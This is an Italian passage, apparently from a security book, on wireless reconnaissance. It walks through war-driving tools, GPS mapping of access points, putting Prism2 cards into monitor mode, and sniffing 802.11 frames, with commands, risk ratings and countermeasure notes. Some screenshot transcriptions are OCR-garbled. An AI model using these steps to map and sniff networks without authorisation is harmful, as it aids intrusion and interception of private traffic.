Il punto debole principale di NetStumbler risiede nel fatto che si basa su un’unica 
forma di rilevamento delle reti wireless, la Broadcast Probe Request. Generalmen- 
te, i fornitori di apparecchiature wireless offrono un'opzione che consente di di- 
sattivare questa funzionalità 802.11, “accecando” in questo modo NetStumbler. 
Anche altri software per war-driving attualmente disponibili, per esempio Kismet, 
possono utilizzare questo metodo, ma dispongono anche di altri meccanismi di ri- 
levamento utilizzabili qualora questo fallisca. Premesso questo, esistono tuttora 
diverse reti che possono essere rilevate da NetStumbler e la funzionalità che pre- 
vede la risposta a una Broadcast Probe Request è tuttora attivata di default da 
molti fornitori. 


1) Kismet 


Diffusione: 8 
Semplicità: 7 
Impatto: 9 
Fattore di rischio: 8 


Kismet (http://www.kismetwireless.net/) è uno sniffer wireless per Linux ba- 
sato su BSD e dotato di funzionalità per war-driving. Al pari di NetStumbler, esso 
consente di identificare punti di accesso wireless e le loro coordinate GPS ed è 
dotato di molte altre funzionalità. 

Kismet è un tool passivo di rilevamento delle reti, che procede ciclicamente alla 
scansione dei canali wireless disponibili, alla ricerca di pacchetti 802.11 indicanti 
la presenza di una LAN wireless, quali Beacon e Association Request. Kismet in 
certe condizioni è inoltre in grado di raccogliere ulteriori informazioni su una re- 
te, per esempio indirizzi IP e nomi CDP (Cisco Discovery Protocol). 

Kismet contiene tra l’altro un programma chiamato GPSMap, che crea una mappa 
dei risultati generati da Kismet stesso. Kismet supporta la maggior parte delle sche- 
de wireless disponibili per Linux o OpenBSD. 

Per utilizzare Kismet, occorre innanzitutto installare i driver personalizzati occor- 
renti per il funzionamento nella modalità monitor. La procedura varia in base al 
chipset utilizzato dalla vostra scheda; tuttavia c'è un metodo che consente di atti- 
vare tutti i driver per il funzionamento nella modalità monitor. Prima di avviare 
Kismet, eseguite lo script kismet_monitor per attivare la modalità monitor della 
scheda. Accertatevi però di trovarvi in una directory a cui l'utente di Kismet possa 
accedere: 


[root@localhost user]# kismet monitor 

Using /usr/local/etc/kismet.conf sources... 
Enabling monitor mode for a cisco card on ethi 
Modifying device ethi 


In questo modo, la scheda wireless configurata nel file kismet.conf entrerà nella 
modalità monitor. Dopo che Kismet è stato caricato, l'interfaccia mostrerà qualsia- 
si rete situata entro il raggio di copertura del sistema. Di default, Kismet ordinerà 
le reti in una modalità “Autofit” che non consente di passare dall’una all'altra. Pre- 
mete S per portare in primo piano il menu di ordinamento e scegliete una delle 
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opzioni disponibili. “1” (ora/data dell’ultimo rilevamento) è la scelta più appro- 
priata nella maggior parte dei casi. 

Nella finestra principale, mostrata di seguito, viene visualizzato il nome della rete 
(SSID). La colonna T visualizza il tipo di rete, la W indica se il WEP è attivato o me- 
no, mentre Ch rappresenta il “numero di canale.” La colonna IP Range mostra 
qualsiasi indirizzo IP rilevato, tramite richieste ARP o il traffico normale. 


fw root@ localhost:tome/user 

letwork List—(Latest Seen) =_= o Info — 

Name Ch Packts Flags IP Range Ntwrks 

<no ssid> 01 1098 0.0.0. 13 

APPLE 1383 0.0.0. Pckets 

N06. x249 j 18654 

Cryptd 

45 

Weak 

[0] 


<no ssid> 
dlink 
INSIDIAE 
INSIDIAE 
Aironet_350 
<no ssid> 

! ugcw1r31355 

! ugewlr31355 

! proxim 


1381 Noise 
25 
1246 
798 


3535 T4 


) 


oocoococococoli 
co000050050050f 
co0000000É 
o50000000È6 


AY 
a 
PN 
AN 
AN 
DN 
PN 
PN 
AN 


- 
n 
[e] 
nm 


Elapsd 
-000926- 


tatus 

Sorting by time most recently active 

Found IP 169.254.203.204 for INSIDIAE::00:04:E2:2A:24:D8 via TCP 
Found IP 172,16.0.2 for proxin::00:B0:D0:7E:92:15 via TCP 
Associated probe network "00:04:E2:2A:24:D8". 

Jattery: AC charging 100% 3h11m0s 


© Contromisure a Kismet 


Non esistono numerose contromisure per Kismet. Kismet è attualmente il migliore 
tool per war-driving disponibile ed è in grado di identificare reti che ordinariamente 
sfuggono a NetStumbler. A parte le sue funzionalità di rilevamento delle reti, esso è 
in grado di registrare automaticamente pacchetti WEP con punti deboli IV da utiliz- 
zare con AirSnort, nonché di rilevare indirizzi IP utilizzati sulla WLAN. 


® Dstumbler 


Diffusione: 5 
Semplicità: 6 
Impatto: 9 
Fattore di rischio: 7 


Dstumbler (http://www.dachb@den.com/projects/dstumbler.html) è incluso 
pacchetto BSD-Airtools per i sistemi operativi OpenBSD, NetBSD e FreeBSD. È 
un'applicazione di war-driving che supporta la registrazione delle ubicazioni dei 
punti di accesso con un GPS. Essa supporta sia le schede Orinoco sia quelle Prism2; 
tuttavia la modalità monitor, che consente di rilevare punti di accesso che non ri- 
spondono a una Broadcast Probe Request, è supportata unicamente per le schede 
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Prism2. Dstumbler segnala inoltre se un punto di accesso utilizza un SSID di default 
e consente di stabilire se una rete si serve del WEP a 40 o a 104 bit. 

Dstumbler richiede le patch del kernel per il supporto della modalità monitor sulle 
schede Prism2 per Net e Free-BSD; tuttavia OpenBSD 3.2 contiene queste modifi- 
che nel kernel predefinito. Dopo aver installato il pacchetto BSD-Airtools, potete 
avviare Dstumbler specificando l’interfaccia wireless da utilizzare. 


foo# dstumbler wi@ -0 -m 30 -1 log.txt 


In questo modo, Dstumbler verrà avviato sull’interfaccia wi@, in modalità monitor (- 
o), con modifica casuale dell'indirizzo MAC ogni 30 secondi (-m 39) e registrazione 
su un file di output chiamato log.txt (-1 log.txt). Dopo che l'applicazione è stata 
caricata, viene visualizzata un'interfaccia ncurses con tre finestre principali, come 
mostrato di seguito. Nella parte superiore sinistra sono visualizzate le reti identifica- 
te, in quella destra sono riportati i dettagli relativi alla rete selezionata, mentre in bas- 
so è indicata (in tempo reale) l'intensità del segnale della rete selezionata. Mediante i 
tasti freccia su/giù, è possibile spostarsi nell'elenco delle reti, rispettivamente verso 
l’alto o verso il basso. 


+ Shell - Konsole 


Aironet_ (00:40:96:54:1c:0b) bn030:057:027 SSID: Aironet_350 
(00:30:65:1d:£1:00) BSSID: 00:40:96:54:1c:0b 
(00:60:1d:21:93:ab) bn015:042:027 Mfg: Cisco-fironet 
(00:40:05:df:09:4f) i Channel: 6 11.0/100 
(00:60:b3:67:6c:40) Signal/Noise: 30/57/27 
(00:04:75:62:27:ce) bn081:108:027 First Seen: 11:13:43 

Last Seen: 11:14:46 


AAAHAAAAAAAAA A+ [ basic navigation ]——— 

+ttttttt ap up/down 
AAA AAA AAAAAAA4 A : node up/down 
AHAHA AAA AHAH ++ page ap up/down 

F+P++ 444444 HHAH4H+ end/home 
AT HAAAAAH+++ newest/sort 


A +++ +++ H+ : autosel/resolve 
4444444444 ++++ i]: nodes/audio 
AHAHAHAH menu/refresh 
: —_-—--4++4+4++++ : chanlock/comment 


x ++++++++ 
: ——---4+4+++4++ 
: —--4++++4++4+4++4++4+4+ load/backup 
—4+4++4++4+4+4++++++++ quit 
—-+4++++++ 
PP4AAAAAHAAHA+A+++++ 
++++++ 
A444++H 


° Contromisure a Dstumbler 


Quando si effettua la scansione con una scheda Orinoco, è possibile bloccare 
Dstumbler disabilitando la risposta alle richieste Broadcast SSID. Tuttavia, nella mo- 
dalità monitor, probabilmente riuscirete a impedire a questo tool di rilevare il vostro 
SSID. Dal momento che Dstumbler è in grado di riconoscere che state utilizzando 
un SSID di default, dovete quantomeno impostarne uno diverso dal valore iniziale 
definito dall’OEM. 
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Mapping wireless 


Dopo aver identificato i punti di accesso disponibili, potete utilizzare in diversi 
modi questi dati (per esempio potete creare mappe basate sui risultati ottenuti ela- 
borando i dati della rete e i dati GPS). I tool per il wardriving effettueranno la regi- 
strazione dell’attuale posizione GPS, dell’intensità del segnale e degli attributi di cia- 
scun punto di accesso. In base ai dati raccolti, questi tool sono in grado di risalire 
alla posizione del punto di accesso basandosi sul criterio seguente: l'intensità del 
segnale aumenta al diminuire della distanza dall’AP. In precedenza, era necessario 
convertire i risultati forniti dal tool di wardriving in un formato utilizzabile da siste- 
mi di mapping quali Microsoft MapPoint, o dal sito Web MapBlast, per interpretare 
le coordinate GPS. Ora invece è disponibile un software in cui questa procedura 
viene automatizzata e che legge i dati direttamente dal tool di wardriving. Oltre a 
utilizzare i vostri dati, potete servirvi di quelli di alcuni gruppi, che hanno creato siti 
come http://ww.wifimaps.com e http://ww.gigle.net in cui tali informazioni 
sono accumulate in un database di grandi dimensioni. 


StumbVerter 


StumbVerter (http://ww.sonar-security.com/) è un'applicazione che utilizza 
MapPoint 2002 per riportare in un grafico dati estratti da file nel formato NetStum- 
bler. Questo vi consente di evitare la fatica di immettere manualmente queste infor- 
mazioni in MapPoint o in un altro sistema di mapping. Inoltre esso crea sulla mappa 
icone in stile NetStumbler per ciascun punto di accesso. Le icone verdi rappresenta- 
no reti non criptate, mentre quelle rosse corrispondono a reti che utilizzano il WEP. 
Per utilizzare StumbVerter, fate clic sul pulsante /mport e selezionate una scansione 
NetStumbler salvata (accertatevi che sia una con dati GPS; in caso contrario, Stumb- 
Verter non sarà in grado di creare un grafico delle ubicazioni degli AP). Dopo aver 
caricato la mappa, potete selezionare View/Sbow AII AP Names and Info per ottene- 
re ulteriori informazioni su ciascuna rete, compreso il SSID e l'indirizzo MAC. Poi- 
ché sono disponibili i normali comandi di MapPoint 2002, potete ingrandire e modi- 
ficare la mappa proprio come in questo software. Se siete soddisfatti dell’aspetto 
della mappa, potete salvarla su un file MapPoint, un file bitmap, o una pagina 
HTML (Figura 10.4). 


O GPSMap 


GPSMap è incluso nel pacchetto Kismet di monitoraggio wireless, Esso importa file 
Kismet gps e di rete e successivamente crea il grafico delle ubicazioni delle reti su 
mappe provenienti da diverse fonti. GPSMap è probabilmente il generatore di map- 
pe per war-driving più versatile tra quelli disponibili; esso inoltre supporta molte 
opzioni di disegno per ciascun punto di accesso. È possibile creare le mappe basan- 
dosi sulla portata stimata di ciascuna rete, sulla potenza emessa, su un grafico a 
punti dispersi, 0 su tutte queste opzioni contemporaneamente. Sebbene sia estre- 
mamente flessibile, GPSMap tende a ricorrere con eccessiva frequenza alla riga di 
comando. Per creare una mappa con GPSMap, vi occorrono risultati Kismet salvati 
contenenti dati GPS. Deve essere disponibile almeno un file network e un file .gps 
per ogni data e scansione. Ecco un esempio: 
Kismet-07-2002-1.network e Kismet-07-2002-1.gps. 
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£ StumbVerter - Universal Net Stumbler converter Leni 2002 edition 


iti dla fa 


Figura 10.4 
StumbVerter. 


Dopo aver individuato i file dei risultati da utilizzare, dovete eseguire GPSMap facen- 
do riferimento a questi file, con le opzioni corrette. Gli argomenti principali sono: il 
nome del file di output (-0), la fonte da cui prelevare l’immagine della mappa di sfon- 
do (-$) e le vostre opzioni di disegno, Dal momento che GPSMap utilizza ImageMagi- 
ck, il file di output può avere qualsiasi formato, per esempio JPEG, GIF o PNG. Le 
fonti delle immagini di sfondo sono tre servizi di mappe vettoriali (mappe MapBlast, 
MapPoint e Tiger Census); è inoltre disponibile una fonte di fotografie che utilizza 
mappe USGS (United States Geological Survey) fornite da Terraserver (http:// ter- 
raserver.homeadvisor.msn.com/). La scelta delle fonti delle mappe o delle opzioni 
di disegno dipende dai gusti personali e dall'utilizzo previsto della mappa. È preferi- 
bile provare a utilizzarle tutte e vedere quali soddisfano meglio le proprie esigenze. 
Nell'esempio seguente, creiamo una mappa PNG chiamata newmap.png (-0 new- 
map.png) utilizzando una mappa USGS come sfondo (-S 2) con scala 1:10 (-s 19). 
Le opzioni di disegno prevedono la colorazione della rete basata sullo stato del 
WEP (-n 1), il tracciamento dell’itinerario percorso guidando (-t) con una larghez- 
za di linea pari a 4 (-Y 4), il mapping di ogni punto di accesso, individuato da un 
puntino situato nella parte centrale del campo di emissione della rete (- e), e un cer- 
chio avente una larghezza di cinque unità (-H 5). L'ultimo argomento sarà il nome 
del file .gps utilizzato l'input: 


[root@localhost user]# gpsmap -o0 newmap.png -s 10 -S2 -n 1 -t -Y4 
-e -H 5 Kismet-Nov-07-2002-1.gps 
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La mappa così ottenuta avrà l'aspetto seguente: 


® JiGLE 


JiGLE (http://ww.wigle.net/) è un client Java per la visualizzazione di dati pre- 
levati dal database WiGLE.net di reti wireless (Figura 10.5). 

Attualmente il database di WiGLF.net contiene oltre 160.000 reti wireless, il che si- 
gnifica che se vivete in un’area con dati WiGLE non è nemmeno necessario effettua- 
re il wardriving per individuare la vostra rete. JIGLE legge i dati di rete e GPS dalle 
serie di mappe WiGLE. Di default, esso presenta una serie di mappe per Chicago, 
ma è sufficiente effettuare la registrazione per scaricare qualsiasi altro pacchetto per 
altre zone degli USA. Il client stesso è in grado di leggere il vostro file dei risultati 
NetStumbler o Kismet e riportare in un grafico i punti della rete su una mappa da 
voi fornita. 

Per utilizzare JIGLE, è necessario avere installato Java JRE 1.3.0 o una versione supe- 
riore e fare clic sul file run.bat contenuto nella directory JiGLE. Dovete quindi ef- 
fettuare una selezione dalle serie di mappe disponibili con il menu a discesa situato 
nel lato sinistro della barra degli strumenti. Se desiderate disporre di ulteriori serie 
di mappe, potete scaricarle all'indirizzo http://ww.wigle.net/gps/gps/GPSDB 
Imappacks/. 

Se state effettuando una valutazione di una rete, sarà opportuno verificare nel data- 
base WiGLE o in un altro database online (per esempio, http://ww.netstum- 
bler.com/) la presenza del vostro punto di accesso. La maggior parte dei database 
accetterà di buon grado la vostra richiesta di rimuovere l’AP. 
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ELITT Le 


TL e 


Scansione ed enumerazione wireless 


In base alla metodologia degli attacchi presentati in questo libro, la seconda e terza 
fase di una corretta strategia di individuazione e penetrazione in un sistema sono co- 
stituite rispettivamente dalla scansione e dall'’enumerazione. Probabilmente saprete 
ormai che la tecnologia wireless è significativamente diversa da quasi tutte le altre de- 
scritte in questo libro. Essa è l’unica tecnologia che può essere messa in crisi senza 
utilizzare connessioni cablate. La scansione e l'enumerazione wireless vengono com- 
binate, nel senso che in genere queste fasi della penetrazione sono effettuate contem- 
poraneamente. Rammentate che l’obiettivo delle fasi di scansione ed enumerazione 
risiede nell'individuazione di un metodo per ottenere l’accesso ai sistemi. 

Dopo aver effettuato il wardriving, identificati i punti di accesso desiderati e acquisito 
una quantità adeguata di pacchetti con crittografia WEP e non criptati, è tempo di 
passare alla fase successiva del processo di penetrazione. Così come l’installazione 
dell'antenna è la fase più delicata della preparazione al wardriving, l’analisi dei pac- 
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chetti è dal punto di vista tecnico l'aspetto più impegnativo degli attacchi veri e propri 
alle reti wireless, poiché occorre essere in grado di utilizzare e comprendere il funzio- 
namento di uno sniffer di pacchetti e, in alcuni casi, anche di decifrare la trasmissione. 
Durante la spedizione preliminare di wardriving, avrete identificato i punti di acces- 
so e acquisito alcune informazioni pertinenti su di essi. Tali informazioni possono 
essere costituite dall’SSID dell’AP, dall’indirizzo MAC, dall'utilizzo eventuale del 
WEP, dagli indirizzi IP e da diverse trasmissioni di rete. Come per qualsiasi attacco, 
quanto maggiore è il numero di informazioni di cui disponete nella fase iniziale di 
un tentativo di penetrazione, tanto maggiore sarà la probabilità di successo e tanto 
più prevedibile risulterà l’esito dell’attacco. 

Inizialmente, l’unica informazione realmente importante e necessaria sul punto di ac- 
cesso identificato è quella costituita dal suo SSID. Quasi sempre, utilizzerete questa 
informazione per fare riferimento all'AP identificato. Dopo aver acquisito l'SSID, l’ob- 
biettivo successivo è quello di stabilire quali sono i tipi di dati che avete carpito dalla 
WLAN e classificarli. Questi dati possono essere divisi logicamente in base al punto di 
accesso e successivamente suddivisi in base al client AP. Nel corso dell'analisi dei 
pacchetti, vi accorgerete ben presto se i dati ricevuti nel corso del wardriving iniziale 
sono criptati. In questo caso, dovrete stabilire se i dati sono criptati tramite uno sche- 
ma di implementazione del WEP o un ulteriore schema a multilivello quale l’SSL su 
HTTP. Se viene utilizzato uno schema di crittografia basato su WEP, il passaggio suc- 
cessivo consiste nello stabilire se si tratta di una chiave a 40 o a 128 bit. 

La fase iniziale di scansione ed enumerazione di una rete wireless richiede lo snif- 
fing passivo del traffico e l'esecuzione di un’analisi in previsione di ulteriori esplora- 
zioni e attacchi condotti in.modo aggressivo. 


Sniffer wireless 


Una premessa a questo capitolo: gli sniffer wireless non sono diversi dagli sniffer 
per reti cablate per quanto riguarda la decifrazione e l’analisi dei pacchetti. Esiste 
un'unica differenza: lo sniffer wireless è in grado di leggere e classificare la struttura 
dei pacchetti wireless con header 802.11, IV ecc. In questo paragrafo ci serviremo 
spesso di sniffer in grado di acquisire pacchetti 802.11. Se non avete mai utilizzato 
uno sniffer o effettuato l’analisi dei pacchetti (o se è passato un po’ di tempo dall’ul- 
tima volta che lo avete fatto), risulterà senz'altro opportuno un ripasso prima di pro- 
cedere alla lettura di questo paragrafo. 


Cattura di pacchetti e risorse per l’analisi 


Le risorse seguenti, utilizzate assieme, forniscono una panoramica completa delle tec- 
niche e del “know-how” che sono alla base della cattura dei pacchetti e dell'analisi. 


e http://ww.robertgraham.com/pubs/sniffing-faq.html: un sito vera- 
mente completo, che probabilmente risponderà a quasi tutte le vostre do- 
mande. Consideratelo la vostra prima tappa nella ricerca di informazioni. 


e http://grc.com/o00/packetsniff.htm: un'eccellente risorsa con informa- 
zioni specifiche sull'analisi dei pacchetti, sugli sniffer commerciali, sull’iden- 
tificazione dei nodi in modalità promiscua e sulla neutralizzazione di sniffer 
non autorizzati. 

e http://cs.ecs.baylor.edu/-donahoo/tools/sniffer/sniffingFAQ.htm: 
un valido sito introduttivo, contenente informazioni elementari sullo sniffing 
dei pacchetti e sui requisiti generali dell’architettura di uno sniffer. 
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Esistono diversi sniffer di rete per l'acquisizione di pacchetti con schede promiscue, ma 
sono pochissimi quelli disponibili nel mondo wireless, poiché si tratta di una tecnologia 
sviluppata solo di recente. Fondamentalmente, sono disponibili tre diversi settaggi in 
cui potete operare, a seconda della piattaforma adottata: Windows, Linux e OpenBSD, 
Ovviamente, se siete professionisti, sarete in grado di scrivere i vostri driver e configura- 
re le modalità per il corretto funzionamento di uno sniffer con diverse piattaforme; tut- 
tavia, queste tre sono attualmente quelle maggiormente supportate tramite driver e tool, 
La commutazione di una scheda wireless in modalità promiscua è completamente 
automatizzata in Windows; l'operazione tuttavia è alquanto più complessa in Linux: 
per questo motivo abbiamo incluso una guida che spiega come far funzionare uno 
sniffer con tale sistema operativo. Poiché la configurazione del kernel e del softwa- 
re OpenBSD è simile, abbiamo eliminato le informazioni ridondanti. Se vi servono 
informazioni specifiche per OpenBSD, visitate l'indirizzo ww.dachb@den. com. 


Configurazione di schede wireless 
in Linux per la modalità promiscua 


Seguendo queste istruzioni, riuscirete a configurare il vostro laptop Linux e a realiz- 
zare lo sniffing wireless senza problemi nello spazio di un’ora (escludendo il tempo 
necessario per scaricare tool e file). 


Passaggio |: preparativi 


Per prima cosa, vi occorre una scheda di rete wireless PCMCIA con il chipset 
Prism2. Come per qualsiasi altra nuova installazione, è opportuno effettuare il back- 
up dei dati importanti per poterli recuperare nel caso venissero danneggiati in 
modo irreparabile. Sebbene non si tratti di un'installazione particolarmente rischio- 
sa, è opportuno prendere alcune precauzioni. Di seguito sono elencati alcuni esem- 
pi di schede wireless che utilizzano il chipset Prism2: 


e Compaq WLI100; 
e SMC2632; 
e Linksys WPCI1. 


Passaggio 2: acquisizione dei file 


Avete portato a termine il primo passaggio e siete pronti per iniziare. Ora dovete 
scaricare alcuni file, se questi non sono già presenti sul vostro sistema. Se i link 
elencati nella tabella seguente non sono più disponibili perché sono uscite alcune 
nuove versioni, non sarà difficile trovarle tramite una ricerca su Google: 


Linux PCMCIA Card Services Package http://pcmcia-cs.sourceforge.net 

Linux WLAN Package (linux-wlan-ng-0.1.10) http://ww.linux-wlan.com/ 
linux-wlan 

Utility Prismdump http://developer. 
axis.com/download/too1ls/ 

CVS PCAP e CVS TCPDUMP http://cvs.tcpdump.org 


WLAN Drivers Patch (patch di Tim Newsham) http://ww.lava.net/-newsham/wlan 


Ethereal (facoltativo ma caldamente racco-  http://ww.ethereal.com 
mandato) 
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Passaggio 3: compilazione e configurazione 


Dopo aver scaricato i suddetti file, siete pronti per iniziare a configurare il vostro si- 
stema. In genere, la maggior parte delle applicazioni utilizza il setup di installazione 
./configure | make | make install; tuttavia, nel caso vi occorrano istruzioni 
specifiche sulla compilazione, consultate i singoli file Readme per ciascuna delle 
applicazioni. 


È estremamente importante eseguire il WLAN Drivers Patch (noto anche 
Do come patch di Newsham) prima di compilare il pacchetto WLAN sul vostro 
sistema; in caso contrario, esso non funzionerà correttamente. 


Passaggio 4: commutazione della scheda 


Dopo la compilazione, dovete riavviare i servizi della scheda e accertarvi che tutte 
le modifiche siano state implementate. La maggior parte dei tool di sniffing e di 
cracking in ambiente wireless sono dotati di funzionalità incorporate che consento- 
no di commutare la scheda nella modalità promiscua; tuttavia è possibile che desi- 
deriate semplicemente catturare i pacchetti senza disporre di funzionalità automa- 
tizzate di cracking (o altro) incluse nel tool. I comandi elencati di seguito consento- 
no di commutare la scheda. 


Attivazione *root%> wlanctl-ng wlan® lnxreq_wlansniff 
dello sniffing channel=# enable=true 


Disattivazione *root%> wlanctl-ng wlan® lnxreq_wlansniff 
dello sniffing channel=# enable=false 


Tenete presente che quando la scheda è in modalità promiscua non è in grado di 
inviare pacchetti, per cui essa viene privata della possibilità di comunicare su una 
rete cablata o una rete wireless. 


I! simbolo del cancelletto (#) corrisponde al numero del canale su cui inten- 

Rg dete intercettare pacchetti. La maggior parte dei punti di accesso utilizzano 

di default i canali 6 e 10; questo significa che probabilmente catturerete la 
maggior parte del traffico mentre intercettate su questi canali. 


Passaggio 5:inizio dello sniffing 


L’ultimo passaggio dello sniffing wireless manuale consiste nell’iniziare la cattura 
dei pacchetti, per verificare di aver completato correttamente la procedura di instal- 
lazione. Un semplice strumento consente di effettuare questa verifica: si tratta di 
prismdump, un tool che probabilmente avete scaricato e compilato nei Passaggi 2 e 
3. prismdump si limita a salvare i pacchetti catturati nel formato standard PCAP. Il 
PCAP, altrimenti noto come formato di cattura pacchetti, è spesso il formato comu- 
ne per il salvataggio di dati grezzi dei pacchetti. 


Esecuzione di Prismdump *%root%> prismdump > wlan_packets 


Un rapido e semplice suggerimento: quando le dimensioni del file wlan_packets 
superano 1 byte, significa che avete iniziato a catturare pacchetti 802.11, quindi po- 
tete iniziare a utilizzare il software per il cracking del WEP o quello per l’analisi dei 
pacchetti (per esempio, Ethereal). 
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Tool di monitoraggio wireless 


I tool di monitoraggio, come abbiamo già detto, sono estremamente simili ai loro 
omologhi per le reti cablate. La maggior parte dei tool è relativamente facile da in- 
stallare ed eseguire; l’analisi è l'aspetto maggiormente complesso. Per ulteriori in- 
formazioni sui tool illustrati in questo paragrafo, visitate l'homepage di ciascuna 
delle applicazioni e dei tool corrispondenti. 


® prism2dump 


Diffusione: 
Semplicità: 
Impatto: 

Fattore di rischio: 
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prism2dump (http://ww.dachbOden.com/projects/prism2dump.html) è incluso 
nella suite BSD-Airtools e funziona con le schede a chipset Prism2. Esso genera 
come output alcuni frame 802.11 con tre livelli di dettaglio, specificati dal flag -v. 
Per utilizzare prism2dump, dovete avere a disposizione un driver per il kernel Prism2 
che supporta il funzionamento in modalità monitor. Le versioni più recenti di BSD, 
quale la OpenBSD 3.2, supportano questo tipo di funzionamento nel kernel predefi- 
nito, ma per gli altri occorrono i patch del kernel inclusi nel pacchetto BSD-Airtools. 
Per utilizzare prism2dump, commutate per prima cosa la scheda nella modalità mo- 
nitor con prism2ct1 <interface> -m, come mostrato di seguito: 


foo# prism2ctl wi® -m 


Dopo aver digitato il comando, potete controllare lo stato della scheda eseguendo 
prism2ctl e specificando unicamente l'interfaccia. Nell'esempio seguente, la riga 
per la modalità monitor indica che questa è attiva: 


foo# prism2ctl Wi@ 


Sleep mode: [ Off ] 
Suppress post back-off delay: [ Off ] 
Suppress Tx Exception: [ Off ] 
Monitor mode: [On] 
LED Test: 4 
Continuous Tx: [ } 
Continuous Rx: [ Off ] 
Signal State: [| 
Automatic level control: [IOTF 1} 


Dopo aver attivato la modalità monitor, eseguite prism2dump specificando il nome 
dell'interfaccia e il livello di dettaglio delle informazioni richiesto. In questo caso, 
stiamo utilizzando l’interfaccia Wi® e -v 2; quest'ultima opzione provoca la stampa 
di tutte le informazioni del protocollo 802.11. 

I risultati del dump mostrano una Management Probe Response 802.11 da un punto 
di accesso con un SSID APPLE sul canale 6: 


foo# prism2dump wid -v 2 
prism2dump: listening on wid 

[0:5:5d:a7:36:53 <- 0:30:65:1d:f1:0 <- 0:30:65:1d:f1:0] 
- port: 7 ts: 151.143336 1:81 20:0 
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- sn: 3200 (d4:ec:cc:dc:8c:4c) len: 36 
- ** mgmt-proberesp ** ts: 17.605513 int: 100 capinfo: ess priv 
+ ssid: [APPLE] 
+ rates: 1.0 2.0 5.5 11.0 


+ ds ch: 6 
® tcpdump 
Diffusione: 7 
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tcepdump (http://www.tcpdump.org/) è un tool standard di monitoraggio delle 
reti UNIX che nelle versioni recenti supporta la decodifica delle informazioni di 
frame 802.11. Poiché l'argomento dell’utilizzo elementare di tcpdump è già stato 
affrontato in altre parti del libro, in questo paragrafo non forniremo informazio- 
ni generiche ma parleremo unicamente degli aspetti che riguardano l'802.11. 
Per utilizzare tepdump per la decodifica del traffico 802.11, occorre installare 
versioni di libpcap e tepdump che lo supportano. Quando questo libro è stato 
scritto, la revisione “corrente” di ciascun pacchetto supportava la decodifica dei 
frame 802.11. L'utilizzo sulle reti wireless è sostanzialmente uguale a quello su 
altri tipi di reti, occorre però commutare la scheda nella modalità monitor prima 
di leggere i frame di gestione. A parte i vari comandi per ciascuna scheda e cia- 
scun sistema operativo, il modo più semplice per commutare la scheda nella 
modalità monitor consiste nell’utilizzo dello script kismet_monitor, incluso in 
Kismet. Se si utilizza tcpdump su una rete wireless senza commutare la scheda 
nella modalità monitor, verranno mostrati i broadcast e il traffico destinato al lo- 
calhost, come per una rete Ethernet commutata. 

Occorre segnalare l'opzione -e, che provoca la stampa dei campi di controllo dei 
frame, della lunghezza dei pacchetti e di tutti gli indirizzi contenuti nell'header 
802.11 che mostrano il BSSID e l’indirizzo MAC di destinazione. Sempre per finalità 
di parsing, è possibile utilizzare “wlan” in sostituzione di “ether” in comandi tipo 
wlan protocol ip. Nell'esempio seguente, abbiamo la modalità monitor già attiva- 
ta sulla scheda wireless e stiamo eseguendo tcpdump specificando l'interfaccia wire- 
less (-i eth1), acquisendo le informazioni 802.11 extra (-e) e stampando dati hex e 
ASCII estratti dai pacchetti (-X): 


[root@localhost root]# tcepdump -i ethi -e -X 


Nel pacchetto seguente, potete vedere che il BSSID è 00:60:b3:67:6c:40, la 
DA (ovvero la destinazione) è l’indirizzo di broadcast (FF :FF:FF:FF:FF:FF) e 
l'indirizzo della fonte coincide con il BSSID, l'indirizzo MAC del punto di acces- 
so. Il tipo di frame è un Beacon; esso sta utilizzando un SSID proxim. Il punto di 
accesso è in grado di stabilire un link 802.11 con velocità pari a 1, 2, 5,5 e 11 
Mbps sul canale 6: 


16:13:52.974207 BSSID:00:60:b3:67:6c:40 DA:Broadcast SA:00:60:b3:67: 
6c:40 Beacon (proxim) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 6 

0x0000 18e2 3540 1300 0000 6400 0100 0006 7072 TS; pr 
0x0010 6f78 696d 0104 0284 0b16 0301 0605 0400 OXimM: ene 
0x0020 = 0300 00 
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® Ethereal 
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Ethereal (http://ww.ethereal.com) è un tool per il monitoraggio delle reti basato 
su UNIX e Windows. Sebbene non sia stato progettato appositamente per l’analisi 
delle reti 802.11, esso supporta la cattura e la decodifica dei pacchetti 802.11 con li- 
bpcap sui sistemi UNIX. Nel caso dei sistemi Windows, esso non è in grado di ac- 
quisire direttamente pacchetti 802.11, ma può leggere lo stesso formato dei file di 
cattura generato dalle versioni UNIX di tcpdump o di Fthereal. Per questo motivo è 
possibile raccogliere i dati su un sistema UNIX e analizzarli in un secondo tempo su 
una macchina Windows. Utilizzeremo Fthereal per la maggior parte delle attività di 
enumerazione, poiché è dotato di valide funzionalità di filtraggio ed è sufficiente- 
mente compatibile con piattaforme diverse da consentirci di visualizzare i dati dei 
pacchetti nello stesso modo su sistemi UNIX e Windows. 

Ethereal richiede la presenza di driver in grado di funzionare in modalità monitor. È 
necessario che la scheda sia commutata nella modalità monitor prima di iniziare a 
catturare i pacchetti. 

Per utilizzare Ethereal per catturare pacchetti 802.11, commutate la scheda nella 
modalità monitor con kismet_monitor o con il comando specifico della scheda, 
quindi avviate Ethereal. Premete Ctrl+K o selezionate la voce di menu Capture/Start 
per portare in primo piano la finestra Capture Options (mostrata di seguito). Consul- 
tate il menu a discesa degli adattatori per selezionare la vostra interfaccia wireless 
(se non è presente, digitatene il nome). Potete configurare le opzioni rimanenti in 
base alle vostre esigenze. Non dovete invece occuparvi della casella di selezione 
Capture Packets In Promiscuous Mode. Poiché la scheda viene impostata nella mo- 
dalità monitor prima di eseguire Ethereal, questo switch non ha alcun effetto sui ri- 
sultati acquisiti. 


Capture — 


O Capture packets in promiscuous mode 
Filter] | 


CS = I 
File: i 


| 
DU img bufer  Nombnt pffles fe _k] 
Display options | 
[2] Update list of packets in real time 
[2] Automatic scrolling in live capture 
Capture limits Î 
(DU Stop capture after Ù : $ |packet(s) captured | 
[Stop capture after | 


] 
(O Stop capture after | 
Name resolution " 
[2] Enable MAC name resolution 


[ Enable network name resolution 
[Enable transpori name resolution 


| ($/second() 
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L'interfaccia di Ethereal è suddivisa in tre riquadri, come mostrato nella Figura 10.6. 
Il riquadro superiore contiene la lista dei pacchetti; essa fornisce un elenco riassun- 
tivo dei pacchetti catturati. Il riquadro intermedio fornisce indicazioni dettagliate sul 
pacchetto selezionato nella lista, mentre quello inferiore è un dump dei dati raw 
hex e ASCII, chiamato data view. 


(| capture> - Ethereal 
Elle Edit Capture Display Tools 


fc. [me Source Toesinaton — Jerotoca 


350 22, ‘015073 vi _62:27:ce IEEE 802, 11 eater trae 
